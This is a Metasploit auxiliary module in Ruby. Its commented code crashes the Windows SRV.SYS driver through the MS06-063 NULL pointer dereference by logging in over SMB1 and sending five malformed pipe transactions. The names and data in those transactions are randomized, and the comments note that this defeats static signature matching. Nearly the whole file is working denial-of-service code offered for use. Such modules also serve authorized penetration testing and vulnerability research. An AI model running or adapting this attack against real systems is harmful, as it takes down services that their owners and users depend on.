rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary denial-of-service module for the SRV.SYS NULL pointer dereference
# tracked as MS06-063 / CVE-2006-3942 (see 'References' below).
#
# Points a defender or reviewer can read straight from this file:
# * 'Notes' declares CRASH_SERVICE_DOWN, i.e. the module is registered as one
#   that can take the target service down.
# * The session is pinned to SMB version 1 (`connect(versions: [1])`) and the
#   'SMB::ProtocolVersion' option is deregistered, so the operator cannot
#   select another dialect for this module.
# * The pipe name and the data string are random on every request, so a
#   static match on those values would not recognise this traffic.
# * The vendor bulletin listed for the flaw is MS06-063.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  # Registers the module metadata and removes the protocol-version option.
  #
  # @param info [Hash] metadata handed in by the framework; merged with the
  #   values defined here through update_info
  def initialize(info = {})
    references = [
      ['OSVDB', '27644' ],
      ['MSB', 'MS06-063' ],
      ['CVE', '2006-3942'],
      ['BID', '19215'],
    ]

    # Stability is the only populated note; no side effects or reliability
    # claims are declared.
    notes = {
      'Stability' => [CRASH_SERVICE_DOWN],
      'SideEffects' => [],
      'Reliability' => []
    }

    details = {
      'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',
      'Description' => %q{
          This module exploits a NULL pointer dereference flaw in the
          SRV.SYS driver of the Windows operating system. This bug was
          independently discovered by CORE Security and ISS.
      },

      'Author' => [ 'hdm' ],
      'License' => MSF_LICENSE,
      'References' => references,
      'Notes' => notes
    }

    super(update_info(info, details))

    # run always negotiates SMB1, so the user-facing version option is dropped.
    deregister_options('SMB::ProtocolVersion')
  end

  # Opens an SMB1 session, logs in, and issues five transaction requests
  # through the client's trans_nonull helper, then disconnects.
  #
  # trans_nonull is defined in the SMB client library, not in this file; the
  # meaning of each positional argument should be confirmed there.
  def run
    print_status('Connecting to the target system...')

    connect(versions: [1])
    smb_login

    begin
      (1..5).each do |attempt|
        print_status("Sending bad SMB transaction request #{attempt}...")

        # Fresh random values per request (1 to 16 alphanumeric characters).
        pipe_name = "\\#{Rex::Text.rand_text_alphanumeric(1..16)}"
        random_data = Rex::Text.rand_text_alphanumeric(1..16)
        # Three little-endian 16-bit words: 1, 0, 1.
        setup_words = [1, 0, 1].pack('vvv')

        simple.client.trans_nonull(pipe_name, '', random_data, 3, setup_words, true)
      end
    rescue ::Interrupt
      # NOTE(review): this path returns without calling disconnect; whether
      # the framework closes the socket afterwards is not visible here.
      return
    rescue StandardError => err
      # Any other failure is reported and the method falls through to the
      # disconnect below.
      print_error("Error: #{err.class} > #{err}")
    end

    disconnect
  end
end